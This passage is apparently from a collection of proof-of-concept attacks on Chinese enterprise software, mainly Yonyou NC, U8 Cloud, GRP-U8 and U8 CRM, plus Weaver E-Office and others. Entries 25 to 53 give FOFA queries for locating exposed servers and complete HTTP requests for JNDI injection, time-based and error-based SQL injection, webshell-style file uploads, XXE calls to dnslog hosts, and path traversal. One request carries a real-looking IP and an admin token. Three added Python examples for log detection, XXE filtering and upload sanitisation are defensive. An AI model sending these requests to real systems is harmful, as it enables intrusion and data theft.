-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

The uploaded file is then reachable at:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version: <=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

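The injections in entries 26, 27 and 29 to 34 (and the later waitfor/DBMS_PIPE/hashbytes payloads in 39, 41, 43, 44, 46, 51, 57 and 58) are all blind: the attacker learns nothing from the page, only from a 5-second delay or from an error string. That is also what makes them easy to find after the fact in web-server logs. The script below is an added example written for this page, not code from the original post or from any vendor: it URL-decodes each logged request target twice, matches the database-specific delay and error-extraction functions the PoCs rely on, and marks a hit as confirmed when the logged response time is close to the delay the payload asked for. The log layout (combined format with nginx's $request_time as the last field) and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines, not real traffic: combined log format with nginx's
# $request_time appended as the last field. The injected strings copy the PoCs
# for entries 26, 27 and 58 above; the third line is an ordinary request.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0800] "GET /portal/pt/yercommon/linkVoucher'
    '?pageId=login&pkBill=1%27waitfor+delay+%270:0:5%27-- HTTP/1.1" 200 512 5.012',
    '10.0.0.5 - - [01/Jan/2024:10:00:09 +0800] "GET /ebvp/infopub/showcontent'
    '?id=1%27+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1" 500 312 5.103',
    '10.0.0.7 - - [01/Jan/2024:10:00:12 +0800] "GET /portal/pt/yercommon/linkVoucher'
    '?pageId=login&pkBill=1001 HTTP/1.1" 200 4096 0.041',
    '10.0.0.9 - - [01/Jan/2024:10:00:20 +0800] "GET /tplus/UFAQD/KeyInfoList.aspx'
    '?preload=1&zt=%27)AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes(%27MD5%27,'
    '%27123456%27)))--+ HTTP/1.1" 500 210 0.050',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) (?P<rt>[\d.]+)$'
)

# Time-based markers only pay off if the database really pauses, so a matching
# request whose response took about as long as the requested delay is the
# strongest evidence that the injected SQL executed.
TIME_BASED = {
    "mssql waitfor": re.compile(r"waitfor\s+delay\s+'?\d+:\d+:\d+", re.I),
    "oracle dbms_pipe": re.compile(r"dbms_pipe\.receive_message\s*\(", re.I),
    "mysql sleep": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
}
# Error-based markers leak data through the error text; response time is normal.
ERROR_BASED = {
    "mysql extractvalue": re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I),
    "mssql hashbytes": re.compile(r"\b(?:hashbytes|fn_sqlvarbasetostr|fn_varbintohexstr)\s*\(", re.I),
    "mysql versioned comment": re.compile(r"/\*!\d{5}\s*(?:union|select)\s*\*/", re.I),
}
EXPECTED_DELAY_S = 5.0   # every PoC above asks for a 5-second pause


def decode_target(target: str) -> str:
    """URL-decode twice: '+' hides the spaces in 'waitfor+delay', and double
    encoding is a common way to slip past a filter that decodes only once."""
    return unquote_plus(unquote_plus(target))


def analyze_line(line: str):
    """Return a finding dict for a suspicious access-log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m["target"])
    hits = [name for name, rx in TIME_BASED.items() if rx.search(decoded)]
    hits += [name for name, rx in ERROR_BASED.items() if rx.search(decoded)]
    if not hits:
        return None
    rt = float(m["rt"])
    confirmed = any(h in TIME_BASED for h in hits) and rt >= EXPECTED_DELAY_S * 0.9
    return {
        "ip": m["ip"],
        "path": decoded.split("?", 1)[0],
        "hits": hits,
        "response_time": rt,
        "confirmed": confirmed,
    }


def scan(lines):
    """One finding per suspicious line, confirmed executions first."""
    findings = [f for f in (analyze_line(l) for l in lines) if f]
    return sorted(findings, key=lambda f: (not f["confirmed"], f["path"]))


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        tag = "CONFIRMED" if f["confirmed"] else "attempt"
        print(f"{tag:9} {f['ip']:<10} {f['path']} {f['hits']} rt={f['response_time']}s")
```

Run it over a real access log by replacing SAMPLE_LOG with the file's lines. A "CONFIRMED" time-based hit means the database executed attacker-controlled SQL, so the host should be treated as compromised until the endpoint is patched; an "attempt" with a normal response time still identifies the scanner's source address.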
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

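Entries 36, 37, 38, 40 and 45 are the same bug class with five different wrappers: an XML document reaches a Java parser with DTD processing left on, and the DTD either declares an entity that reads a local file (36, 38), pulls a parameter entity from an attacker host (37), or is itself an external DTD so that no ENTITY keyword ever appears in the request (45). The two form-based variants also hide the entity reference behind URL encoding (%26Password;), so a filter that looks at the raw body for "&" misses it. The code below is an added example written for this page, not code from the original post or from any vendor: it splits form bodies before decoding, flags every DTD construct in any XML-looking field, and refuses to parse a document that carries one. The request bodies are constructed after the PoCs above, with placeholder hostnames; nothing is fetched.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote_plus

# Constructed request bodies shaped after entries 36, 38, 40 and 45 above.
# Hostnames and file paths are placeholders; "benign" is what a legitimate
# client of the ufgovbank endpoint might send.
BODIES = {
    "soapFormat": (
        'msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]>'
        '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>'
        '<soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault>'
        '</soap:Body></soap:Envelope>%0a'
    ),
    "smartweb2": (
        '__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel'
        '&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]>'
        '<rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;'
        '</p></vps></rpc>'
    ),
    "ufgovbank": (
        'reqData=<?xml version="1.0"?>\n<!DOCTYPE foo SYSTEM "http://dnslog.example">'
        '&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest'
    ),
    "XChangeServlet": (
        '<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://dnslog.example">]>'
        '<r><a>&xxe;</a></r>'
    ),
    "benign": 'reqData=<r><a>hello</a></r>&signData=1',
}

# Any one of these is enough to reject: the external-DTD form (entry 45) has a
# DOCTYPE but no ENTITY, and the parameter-entity form (entry 37) can move the
# ENTITY declarations off-host, so "doctype" is the check that must not be skipped.
DTD_MARKERS = {
    "doctype": re.compile(r"<!DOCTYPE\b", re.I),
    "entity decl": re.compile(r"<!ENTITY\b", re.I),
    "external id": re.compile(r"\b(?:SYSTEM|PUBLIC)\s+[\"']", re.I),
    "parameter entity ref": re.compile(r"%[A-Za-z_][\w.-]*;"),
}


def form_fields(body: str):
    """Split an x-www-form-urlencoded body on '&' *before* decoding each part,
    so the '&' produced by '%26Password;' stays inside the field as entity text."""
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        yield unquote_plus(key), unquote_plus(value)


def xxe_indicators(xml_text: str):
    return [name for name, rx in DTD_MARKERS.items() if rx.search(xml_text)]


def safe_parse(xml_text: str) -> ET.Element:
    """Reject any document that carries a DTD, then parse it. The standard
    library's expat parser does not fetch external entities on its own, but the
    targets above hand the text to Java SOAP stacks that do, so the check
    belongs in front of the parser rather than in the parser's settings."""
    found = xxe_indicators(xml_text)
    if found:
        raise ValueError("DTD not allowed: " + ", ".join(found))
    return ET.fromstring(xml_text)


def inspect_request(body: str, content_type: str) -> dict:
    """Map each XML-bearing field of a request to the DTD markers found in it.
    Raw XML bodies are one field named '<body>'; form bodies are split first."""
    media_type = content_type.split(";")[0].strip().lower()
    if media_type in ("text/xml", "application/xml", "application/soap+xml"):
        fields = [("<body>", body)]
    else:
        fields = [(k, v) for k, v in form_fields(body) if v.lstrip().startswith("<")]
    report = {}
    for key, value in fields:
        found = xxe_indicators(value)
        if found:
            report[key] = found
    return report


if __name__ == "__main__":
    for name, body in BODIES.items():
        ctype = "text/xml" if name == "XChangeServlet" else "application/x-www-form-urlencoded"
        print(f"{name:15} {inspect_request(body, ctype) or 'clean'}")
```

The same split-then-decode order matters for any WAF or log rule written against these endpoints: a signature applied to the raw body sees "%26Password;" and "%3b", not "&Password;".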
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

123
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

The uploaded file is then reachable at:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) Socialized Commerce ERP validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech VPN Service arbitrary file upload (the PoC given for it is a path-traversal read of /etc/passwd)
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

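The upload entries (24, 28, 35, 48, 49) and the read entries (47, 53) fail on the same two checks: the server lets the client choose where a file is written, through a separate fname field, a filename with directory parts, or a fileType query parameter that decides the extension; and it lets the client choose what is read, through a fileName parameter or a URL path that is only checked before percent-decoding ("..%2F"). Entry 49 adds a Windows detail, a trailing space in "%s.php " that the filesystem silently drops. The code below is an added example written for this page, not vendor code: one function reduces an uploaded name to a bare, allow-listed filename, the other joins a requested path under a base directory and proves lexically that it stays inside. The extension allow-list, the /srv/files base directory and the sample names are assumptions made for the example.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumed for this example: what a document endpoint legitimately stores.
ALLOWED_UPLOAD_EXT = {".txt", ".jpg", ".jpeg", ".png", ".pdf", ".cer"}


def safe_upload_name(filename: str) -> str:
    """Reduce a client-supplied filename to a bare, allow-listed name.
    - any directory part is dropped, whichever separator is used, so a name
      such as '\\webapps\\nc_web\\x.jsp' (entry 24's fname) or
      './webapps/nc_web/1.jsp' (entry 35) cannot choose the target directory;
    - trailing spaces and dots are removed before the extension check, because
      Windows drops them on create, turning 's.php ' (entry 49) into 's.php';
    - the extension is taken from the normalised name, never from a request
      parameter such as fileType=jsp (entry 28)."""
    name = re.split(r"[\\/]", filename)[-1].rstrip(" .")
    root, ext = posixpath.splitext(name)
    if not root or root in (".", ".."):
        raise ValueError(f"empty or reserved filename: {filename!r}")
    if ext.lower() not in ALLOWED_UPLOAD_EXT:
        raise ValueError(f"extension not allowed: {filename!r}")
    return name


def fully_decode(value: str, rounds: int = 3) -> str:
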